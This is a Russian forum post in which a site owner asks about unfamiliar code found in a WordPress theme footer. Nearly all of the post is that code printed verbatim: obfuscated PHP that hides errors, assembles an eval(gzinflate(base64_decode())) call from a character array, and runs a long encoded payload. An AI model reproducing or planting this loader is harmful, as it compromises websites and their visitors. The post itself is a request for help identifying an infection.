X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Обнаружил неизвестный код в шаблоне WP, Что за код?
Biznessman
Biznessman
Topic Starter сообщение 16.1.2013, 11:57; Ответить: Biznessman
Сообщение #1


Завсегдатай
*****

Группа: Active User
Сообщений: 686
Регистрация: 22.7.2009
Из: Україна
Поблагодарили: 187 раз
Репутация:   49  


Здравствуйте!
На одном из своих сайтов обнаружил в футере кот такого содержания:
Развернуть/Свернуть
<?php @ini_set('display_errors', 0);@ini_set('error_log', 0);@ini_set('log_errors', 0);error_reporting(0);$str = stripslashes('<?php
$a = array(\'v\',\'e\',\')\',\'b\',\'s\',\'c\',\'l\',\"z\",\"r\",\'o\',\"a\",\'$\',\';\',\'i\',\'t\',\"n\",\'_\',\"f\",\'6\',\"g\",\"4\",\"d\",\'(\');
$b = create_function(\'$\'.\'v\', $a[1].$a[0].$a[10].$a[6].$a[22].$a[19].$a[7].$a[13].$a[15].$a[17].$a[6].$a[10].$a[14].$a[1].$a[22].$a[3].$a[10].$a[4].$a[1].$a[18].$a[20].$a[16].$a[21].$a[1].$a[5].$a[9].$a[21].$a[1].$a[22].$a[11].$a[0].$a[2].$a[2].$a[2].$a[12]);
$b(\'FZvHjqsKFkU/590nBuSkVg/IOQcDk5bJ2eT09c2duAZlCgzn7L2WSi6Ob/+nepqx7L9b8Sf9rgWB/S8vsl9e/PlHTBax2w+m7wJwoimdz5zAdpXn90STwFvPsZCLXyPIvS7GCubfcAoj67hHcJsnadNaUAA+ZPNhwZB28
dF0wT0HL8vzdnoM2xZjRIzRpFJ/qmun4GD9we63ltZFNyfXoodMNU3a0+2B6ic/aplMhH+qBLcDm7Ns8HOjOcdXTbgAPXMpoc58CLsJmfSqvgrENu1bfrIQkohrrOK72AbA/Lb4zu1c8SagLfsJo1JMIv5dPzVYXLi7Qp1scXXyMaL569+/7LtFSq59t4/IQA70Yx4aq84YIMO2avCimcQd6JqJXArAF3Hp+lWet2keNJiuVwaqD/B3th5m/6v9FolYR2jLB/qCpTKxLmwA3yBZLY+r1m8Pi/XSRVi5YLSsXCVPc95uy0QFpzVOakNu1gkcpB9lHwNyNXKNH9T7Ww9nijOc2iYVngDz72ecHTV590f8QP
GuPUokyRpXxTRrEbhERGdV9MYM59aTGzSWQtRIhL54BB4VtG1kua7Sx71R0MU3ZMxCn3ZiAGY7/H6gfhKmYlJ4B76OBb9Swz2JwuhdJVkzGQ0UbrLw5GlWo/CMIifARDXBhlw9bYPhvdjsdQ7kDx9j2SZQukY5yxqTdlbH9SZ7+ONDYYuxsP7L7kFLrbb5PqIJxhhD3l
tfWvG2D75U8uelJRewoPio3ncvLs5IgL9s29lGi1JecPbS9xon8uLmYSxFCyLgSbd8t75CwoakC+2Cwm
9
C6XybhDsT6bvsp2IIKEVOX0/d9F03sMAhnQqQWUJTLd8tQEMtysKkPHlPOgDNGp6gVTtSpTrE3NN4rude9siZfZAvGES2fKMyRF+Fqwg
X4tHhqhxkZoRuBgxKP+kyWL+lryrOW+qHj75KM5lH1c854UE3rBUIH38Y0ktbUC57xZNmwtLEOQZ1/XORA33Y9FJoYMxXTws87g8cbMzeqpQrTnqPYhmI4wLBdtQ2+wEhhwqrOM3f+Kn/7FjyofFaWB3T9rOOtfewbH+1AzmPQpmN945Y1aqUD8LGmDKnaYA/XRtFVmN9YQNTO58CsoC7L75zkmAB6d7iTUWFBqQdFv85afBTWuTAa5Hsfokvod7nU+GXxLAk9c1sfMwB
xE7TRBvPVcvq99nq+xgibT2iX4ic8+pHoYXn+HKh/JaVGcj3d9yPqvOeY8XnznVC4UBYivvcnAKvF4bBtuTZ6LtxolXkgR1t0w5yBePbCghQkWzXHZD6Wx9sW
N332reqUp+czjiNjmih0/EHQOaZeI6QUihrsvOcB7MklmSSb6NLEpHu3FaXoZoUOvaMpBRlNz4T6QlR35+KUyjnfZ+5IjRVa2SZ1b
JcvS3DRw68VmTvr5O4yk3lCl5HrOFA5IqsQQ71AdyQ6TMkPWP9bBpMahsGOjIKKWCY2amhrfgEzsnS7m
d
sDKByPiHUGoaxJ5TG5XK1b6knb58Y2Oy29bsheWNO8vRv2iyPH0B9TSGXUHpK22fzGR9hPZGsHBcsLZX
x
e38aYQqHGXHAYZvjeopT0QLVLBOnkRFcToZMavD1q5FQftrBNmjNA4RdMH2U86rMYm2eRgIWPPKs2tdW
G
+epdZU+S25oScMRkBWXhWEldVvl5K/dAD2n870JuSVF0mTYP51hPpnZ7G/e1MCYkR4lqBEfVdJhAPd1ECwqv1u4860rNj4Dk4LaAaP3JFtVnB/dochUxRP/WpiQO2IH3QTG4vIK6sReOjl+sBd4/7KPMCF5iYfUJUMEqBGGGYJOqPqR2JtWW0M/ewHIkSW3iRqtTkiMwvzIqCEacPsBZGRZge8xZOISZpoMIYUPyZFa2ljoH5UqaP474xpus6g0RaXwKIRq
uDiJvgNX0s7Gktws7o29faNc9BOWAHaZP6g4TuCsL7KSQ+388gMEXT5MQkYyidDhY0QhvkU0B6lUezfc
h
lVoSj4dwLmpkHzG3DEsZdO3o/iEcJK2+FRqlNecMmkmG6EHSYLKPkdq3rotisuS+EyqXsgbDMHG6czS5S4AfpVbFiR/HBrZkDxedPJKqeRBmxR6DtMii0VtMAdVk76Rz5pp9x6gUEu8Z2vYo6b/fsBhhdqoKjX53aeTQNb62/PEOR8XgHfdMDPI1/bv0KLw8xjdvuSuep+OfoAmWWPlaC2VL0ibl20Gj7jGqNdSRyueTzvWBPfzywWpUC5uwsZNqtq7FMwfsU
cCQBQLAp3k8OwqLA434QaefIGQtQEKCEpLusFDovptW9WBxGL7SJ0bwFjb4yAXKM4gSRpnfXoYYbeZD0
v
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
S
CntL/fY1XO+cZk0Py1ySBGnXC8iWcgRv4XAytheKuYtmGr9xj0A7vC6Lg69LvM8CEUVF+HOdGucEtlsOE6Rha
sU2SS2R+zCPIU54QgYCFOb3/Y0Q95C1gto/HJxgpWlrWqj9jvjVJYVRGbnm170J2Beqp0eq4zmRHGldSwizw8RNgRDIY4eYDsuWSmRN3N/lLmiPRuPhd+HSYqJzgb8LM789QeagPX+tBI8ePj1Zkw30dWME1BxkxzmtV5uuwtI4hcCRwEL7d867iz+
JDqjTj5+Pa2NCk6MTv6G1A6DDq0bF2uR9vCl1v+ZQgLANAZ4LM1YRngoYY5hiVmSq6MoicTvzAxS7CEn
u
IKBdAxuDZ8YtRwqJcve5XO47c4XNCVubHGAK5Y243FjioGpmcAPiBN8Obn8DkOncHW6A5hrm+fywaphT
t
7Dsy9fGNLNP8yMtRAT2vQ+HF9foV9vldxwcoufKxZeSTmp1Gs8NSShwRN7bX2+nw2c0FaDDpnPtCz0ll
2
Yn8tdOrWOjnepfbedivprpfSYoyVwXebI4dhAEeXxCY4GwjzSxm3tQO1JhOdxmAUsHr2IOPjhAQfTGC4
5
pnjsJQRIS745UxOsK2K817ulgNCkeWgC0+RzIgPcakG84Wixaq7KUxp5RbxJFwDq8XzFN/EMD270l2Ww/dCroXmvsbzy3646Vk6ecaxEeeNRibx1yxL1KJyUH0uJ5D4hkL5gyiaDAxB7qZvLgUAmf8hV7ryjGbU+V
Eih5iAhCeFsbHZqHyQb032g3xqxFtK0sr7i2jVPbAlBHrEdHyTfEWB+Pmxe5CtPGwdik9UwvqZLGjS5f
J
drzrjAs/u8kEnWbi30gyrAuIP6twU4PaXl2wc1ZKvL28RIA7FVK61tbMBCTslTk4IIWVy+Ccx1DZK2F6c525dfxJ
NsSbvjbpMc9pJJAk7wKzwb7Na10aQabS/jZO5WNkJygfqgUXMjmyhY+tSRZL6u8jLO38qcinvcEepmQF3NCUEw3ZBn2Hazi/VqVkVpDKhlePx7DhNZoqBvojdBCbS4iR8f4wHY/dABmSMehms7HVhVu5ZjfykmOGt585WzPpIVrTHGyum/C6gpowRa3hXqQFBMzmLOttAkwJf/OEZFw/iJfHvwFXRwX4d+kBQAcflfSYXZNue0yIsN4jxWq1NYStZKwzpUSoIqAYrXsA0LXlYv/tGRiBIEsljmnX2wkvigeTuS77YJvcy4+9oYJbNTLAZ3676drapUU7oBYxTwbaW6E+HvP6Dumch4Z73An
R9hrl9rgEHpwkxyIWr4qGeZzBfqIkuW579WJQQgYH7rU8X7vv2AD52kQKH65u+5RTpyXm4A+p+gzfxym
F
fK6r3DRobb4NTPd1d/JF6W0lzCidEXfreVOsCmf7YUpWfLyaAsK8WoQr74nWj6tiL49REaHadBMdOr1YJhjrf9MBGdCPi6CcHT
wcX61tlbgB28dUPq2OdH+TrZ3QGPRafeJrU9BxYuyAoSjLefDEGvZfT4cIgPSk/4uYQS415by46vVCqqe6HGtPd4Fd6ujotdhNhbELyfe/uiL/A26duUEksm7KRG9uWzJt98+a2EDsmLZFfJqMv0Fxfs5godXGSBomx9t8UOj+U7mBpQHDqWHZZkQbT+S2
7nixVSxdlZOiuEKCLSKkf34+94cCa7tKHrpRCQklIwbGwPLPGl5tK1liNyqFbbdqYHo0gIIXOifx/Peem5bazcHcIDoN52IpHOQsB1zITPJu0Eou8j+PFdCfyI+Fif2u8374OWaneaR6mA3hKIQIw8QeeawKg
AP3Ir8gj8ClMOzaq0gQ6il4cJL+JAK9C6epVEiC8IS7SNcKa+aTlh9eB2Wt0l5FT2xGBE+rj+Y1H6xZT
4
gD+ThfSVj79X5SLg72s3gGe1/tF04MyC1Q/OQLad/PM4ExtxR0ycyWKLiG0EXUusNTh78hdG6byHVv+rH4zObwnUA/YaorVwj2onxfL3AUoMxczWLGCR2xO48mTwzCeErR+yQo/r6o7YQjUbqUhqRRizireTlkeC/uY8RXh+xKlC9dY+P8Q5kzzz6aVlo9B2lLfR6YiZ9a3v0Ndvjn4vtv5ZWzeZycmbW+SDwyj8HOCGq7R4F
ijV0z5gwC42+qEghHpiiZ2cBvKo05fsV62OFOm9qoHQiA+4P2iusqqYwgpurxRNXZXYVAauIjzkMeTri
g
qOknKOihpt0tKb8S0MRO1HRqYK8l3j26kvfwBkxLjdB/Vj3QaxL4YfQFMQlrj+Vn2BBGvdse3xgZ+2Ei4KjpZ1EPGVr1kbQG7S2rzuv0lfxdpSXORVK9CJ/BQnD6Cbqxk1/SAr1gy3bgmNGZGS+XwJfeZSdrepWwjf/tQxOj+8fOg6XGDiEvrpn1i4Q9rcgzHnNBzvsidwY3RReMmpaqe+p8Wd20+Qk3nNOpmMJ87DjSV+joiLd
lOdfXCANMPa7qkkitFvIYYaefkNLhrJuiVZOPj9MxxOrlUFKCApcSRgf1Mi1X8zOHJHdabQLVCe5sZBh
b
101Tv0yIx85jiSppQB0eStnEsbi6ECkY9NsGbsedJ69Dz4fbRV+g7QYCpPOwnnaup8E6d/YlhrVHY4DRmhhJ/gXlnjk9YKgLGXT9u6+mHJz4v/gL9eyB4Dv5/TAMImhGRcoKOjW0x0HrDnKG8V97gn6h3H7cXabW5KK5RVyS5vmNNCqlaOiR9vy+hUMjFE3gEg8LnoNCh
IRLHMoErgB+WIrqBOO69g2OSMANPKwgomuAj2qGmZqCNmY3iNsbxcEp7XzouHMSgVfPtEE8Q3h3xH16r
6
LjDJd9uGgq+LYk4rhmurWWsH5PEk3iIB6ys9FB3SKcdKthpi6Ccp7LcDybKUedlwRgb4hL9VBfg3RDUh
z
f2bcCde+t3NyjNkW9DnD7WWwPe2ZKJdn4FK3/Qmg1gNPRwNZHT2EAd4WUIuBkq2gj2J4b3v9CbkpjnTlO59l94wn0nJ6qDLiQLYK7RMHC39qlyNp3ue8Z
917YfbfdqwTtmOwqmbWwIVOWWNu6OF+RZJyy/S5NV2Zl1Rk63PXIeCdmC/mtP4llDeEbzqtJKfETwAIYrNtHm+7q/HiHetYkn2LMDijLFH/GVzYIjEQSLktS75ND9JVaS5NyQWhaqQLpymhJrFSldGdihXlBD+JLHxRdEOjC4xA8BMF8146agERAws0
PS9B39WN5vcuUL4OXUOlReCQmSKLdpaQZQPfKKReb7slIyO2nNwm1C5XYNfu/c+CPvkHUS3RZ8kmCFVPREvuECNaf+ZYDsb0wiroD1z8e9FIQ9CSva0BedpRHhkVoYQSs0i1n+PpNnsO8
balDvaWxP45McAbILlbFFVVNDhRHmO50AwuCIy05PPgkwDJujZdNzpCyQueRtHJKEe8AAMUNq1FEhMop
M
UhLf4jqWHpFNtSvYAkAByJq+nIA0fO4h7wKh/LLchAMbDulJ9dA7Gia8PhWW5krQgT0BAUl4GWqhvY1L7pRXvziW7L/jMh/jJP9o2F1G27fo9Dbcp1TnB3MSDrcJOaasHjoEkcQQF+JkoJkdPCa9XtSJnP4RQi5GB2kwWAdRrR+Me1H
bZyWMUKAHE8zOaDifXtC4X3480C14f154ydW4oCtY0Fx8KT/niM7NJrpwZETs/NARjVZiwhSDHfuNyAun4ODdFG6m0w0zqdG54oh9y8Gwc43UiaY5rs6z7+bRzgcSD79BWYtRspGduuyzY
vkXRtJOsbr4bSsj0088+gQ0hVQU2SEDRzZjtDIrSKZutWXBOc7Va+IHhwWA2yhRjBkJFQeeQx5Et1Alv
r
AOlvuzDVOqWzoXVBQfqSNr83oWoxYQXAXcoTDcsoBgF1IRRi8LNHIeC9Ib+gpURKx7rMV7rrXrB1lIEe
r
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
p
muvUyMYJ+rkslPlGGuRG/i4zklQCjd/DqIisgvxhrK72yLzJZAeFYb7QdMukLY/0rtql6+jPKhsvLElz4WVy/5aynU7FSL4YL3+uzze52Pym1XJFbxP1Bzzs0l1ERjt+Aqg0fOgkqd33Y//z6a28b9OR7EPwm7RjZDKZR2Enbkc7IczAlxfIjRr0T+nylsZDQ73wCaVOrT4jgLjXBxX3PpiSCa2YDww
PkqsqDkS47IlH3dAEldLl+eiR3bNROtwGZvSOOPfoCVCL9YeG02aK/IR9CqnnLik93KQ204qALspO1x9uwRD8LHmvj7XAGqInU50ekwR7X0Z2R7W99PDC8KjLKzkp6ZG+yykYy
vk6ACsloY+BrxgRnGAEvElJ+EMDxSkhI3FUXIeX54/YGab9e34Q1P9ndOnMo4Alxe/9QrWa0ON3MyydksghSAyXkDygFwUdEUyS25ufgZLDf+UxteBIjh4hHgW5KalqcsWMDS1bt2UMCvE9A6Y
jzKYjj7j8CB2JijG8PY8V34lPEcQ4bqLZ5aIyphW9+GAeMsr7quO141jSdmXzcWTgEedhsN5UwD+yuoy
J
PL0pnHJllhwFXSfksa8fQBLaCqh6wpxiEWe6SeMZwSin5cF5DgiwVSiJ5r+MXwSXaveaccohvwFfZj63
O
6tWrs3Kt6Ue+HAKTb+Tk1w70TmgoEeOEvVk/Zhi2q3WuUs68PCrUCVuEIvoK3lFzZaYWBRVXGI0T9VJKSErgvglr8npzc3C4iSWPU+qZ28FsppLH4MaJ
mLyJS/iimASG+HIfMvBHFiqztbxNXDUSENpW3lUmpprFXPWswd94AHzCfNIaxvGN/KhqlWgy22QwknHPvfgsV+AA/UUx1fhxNTwBrfW4yCSALZ4ocYoskCQaRil0kC8TMz3/8plefz6SQCjofvXgpq7hCFmXGTdzJoSuEVoEc0r+gbJ8QSc3+JLT4TTERwKJOwPNahGG29HHDj+CSktF
chJoLvpa00t9WOE3+1yLhoptS2f2W5FmICA55dJ8Vx3/jeg5gZU3esewaCT25aKR+31CaU08OCet/KAq5iJAnExEZJmkT6GtH1Yu3onEZbFMN0E1XN8Kj9Yhh8b5BQyIiBhdZcdtgT0N9veidjDvyStKeTs5V
6d7WxzzZMGednJ0ZM3h0AIsNL5zlarJeoCN5GxVQbHAlzC8r7NIR3HTtaVJXVEYG1htsRTsUwxxQFITd
z
AE+A1KgJDSo+BXmQzOP7Zyl+T4kWyf1B/DXd5gkGGDm8u6971T6RepG2Qot53HVIHZJ5jfAnHlsZCnn3XxCTsM+nEECPiVn4MoXL0SETQm49FWnY7
rpmcbVIhhqN9BbwZY9q+7aN3D0Ei5RWg9xk/+FngBZO1BXQFpf6Qc/+QGQUHFaQKBTdDZbAUQw/kYQRS29oTPzE43bix3hRkQrfIY0KRFXxwfaEj5hXl1k1f4Yk2SSWJMyZR2G1NeTsZFlASBpaRJ/+Zp5+ds1smYPwriDMxa5GiDnqIOP8UT6WX1usL0XSfANH6abXo3bukl7h7aVxXJxo5GkwaKBr1weiw4k
0HkeKybX3yW2lqph8oapyNhyDc0TUqAOWFaWsksnU+djCdFUcEvmmJ9cisDB7hNwRAt8jiV1lNwL6Eyx
w
iJBAL9Dm1nU0tkoPcegL5fHWKXH4i3Vp7EPiypt7Mvx/OAwQ+ibZJqCppZTlPLAXjhCnAZDJhSNfnvP/wdxRKCdYay9Gpj+jp+qz5ZC+D7EOWIqNwN+ALPya+duTOVJt6n2G7YJJBNbOsA0dPA9YqjNw1rFUb9fO
wwVvMjvu/pgNTjB8TPjulitr9OkxkFUKL13YEujzyUmSNEYSkiz2G2rY6rIMqysvCF6bfbL2O7uWhmMuZ/cy30c7jvbxt7T+kBrvBZT/FL2oW+6Gh3E1lBPqlPZvpqNLhFA9R+uC/XyIO6zxfoIjpNPxGJOtTFyddy1oswo0jefJogP0Plaspbn2k4aRYKM5iLxB51iq0B5Fl3gkqsoS7P/5hg0H+AZt92XZnCM19LjMnQsAxWctlI9nCvKtWoVoEMYijlrYTHZO/Ok0fkNAYaTJRiMvX30dPYRFrxhVPxO4rvQ/U7rDOopUsOg99gzEDGuut7Ur9rJSyoCCvfEvpmHb/iKmiKzvprxlQwwWj4WeRZRr8QO3GnYluePpUuSR5UGbUGZegJB9ITPoCoWKE0/mQLjB4YUReo7D2tlmmsb1oggqbcBQsdNeAQW/fLeg5f8Hf4bP2Cc3HTsB4jwTiJ4319HBeJt7gryaLuQU4u5C3S2ekAUF1XJW6oCaHFvS6ma4Fij0bqvw
5qmtrpYo+4ym8e9g2jFYffp6WKvpzLqIBARuBjq+gXkWj+QO+Fkhop+5mhgvp23bIFUwBpr/u6ATAatEx44e4sC0rANwkeFMFGXmGSnDwjPHmkemuO5yUfiYR+ZEL7uh6DEa1gr2ARBimmYOnMYOKTfq
xDyYCsKW6mVhArIGUcsc5yXsQ5aVblRo5NmVxFzm8C/YimowsXPsEBLyAy0h9oc2Nf9mrERz49KbXTBhSQHMzlCwHfNCZ/xjgttEfBbEcUE061rHCb30h9wtYKGEb9YsgtHIWvgueTmdLjgAsfVdFaA5UED42oZwI4bPWgwYXJM515
Bow/c0UDs30IaSDZQOu73CVEGE/jo5gVE6Zi6ZydkM0I1JlQkbeTFpdrWq1ugi4wfHq7CHy8/+yzQpSqAnp58OMe7bDVK6/Q3oXsrhqiV4adg39UlLsB8xVLzvndheulSPILe5JISe9z7urtj68n23KA7f4bHSw88aSuG5F4uSh2UWY
JmlY+fSvlwr+QRWAHytXtj+ZcRNLUVkrr0aOtCR3jl7ZR+o4z29Hnw1Nz+lqF8WKPtz7qyU6OGFQ//T6GqMOOaW1ede0hhmcsDDRSg9gEK1UYDppfn/E5fSxRD1KgQBN6n26xHw6IdINBRlZsP0qUk8C6pj/FU6XkY7EugZ6U5diEPACyrYpFI8Dqs/kLofZ2biPfHoOs8ZvVKAwRA6OcqGs5W9UuDRXk9Q6s40w1g0RVZj6JYMG+tJCgMbJUlmdOrevI9Btemc
6Cdn/muJMxyzj/FjSJ2tCwFssLyPiu7YAcrAM21JnYNDagkh5dxEVGUZKFr6nk59i5CHSBie9BIe+RFpif04fuu9hIu55S
QYpFwaniRIovZPXcRGhXYPRzWwjdvZYlnGeYGQjkfmdMayl49d4RwnCRixml367sNSdE95XrKH4UrnRw
7
9DJDqOvgn0+kgH0TcrIoT4Vq41DStCYxOHU8UiLRQ+u9CIO6O5a3PLEniF+NOsaQ52DicNkKuODq4BNP
A
CcJj+lGCMPm5f9B8l1csATrb0e6dc591Njed25RjhUaVkCYjooywRjjRwQGkoRTjah2obxqytGFDqd0/OO6CSnZLpnpJXJZHnXFAuqYZi7Ez0+nhzDeePpq+g2U3l4D3bMgp8XyziEcE0cr6mlSo6a1pZj5Z6iXA
kgFLWO2Pnt+8IxfoWKFGINnDrEQLHeUqyJVZ+GUkVCY9oPpH5J3AfNzdepORFfrL1iUmvFRUHDbEDden
z
kN88upH7vO5DrJZV0T8uWeRjldzAXvKAtgQhnCk8J6DTs3kZAvQZHH0IuJ/4ZMQZ2hhIkUCA4rF5xclo13/0wy+2SRNoMqhnPwajTfwNEj4+zR08PJ/PkIhlZ2TuioYvT44hUyIOrjrqrBS4aIAvHL0nv8uqSf8eFGk8xW025RXmEPdPSKoVdHzdQmYDJBOT+JH
7iTqjfQwKdeUL5m/cy1CRvv2bpgrqb+tY+bd/KXLnXn6EgoynLjm3a1wcHXVkeHlp+Wz9F72+kWIVfbix/qmosWnNshSgoMY50V7043MkTvn6YLchtIvdU3mVr+e6JTBdi9V0knNDYRxRVGpL4aqxI08hZlHJk43lm
ph+PKl5io3wdb671YFFrgPve8j17d1t4RhgeDDNrxQs8v/nqc3teVZMqtdmFom2/JP4q2ROtR6uAeZCABtHPB7SeicF/LfdeUTK9YX7gYZBeYf9BMPArRjWN0SXS8ZxO1R8u3VDINMB3Cgnga0ZwWxgq+Q21EMw0uTTpzfNr7D3+
BaYkiFw0o7GODiyYo7lNIzRNB5v7bHSOo0R+465GDDL7c67HrF5rKBKcGvgieZq/gwcMyrmDb3uga7NWPLdIW/ON0xPre+iTwX2WTBazBGQnEOYMPYSWpJuX4iMc2ejl9nWoWpESSJT/mbi2fl1FdAANIpSY4iQ64fzmeobmgHhG9sStseRT0MLD5BVlY3bqCwbhemWZAnEqCO3IPsApUmZ5aWvz
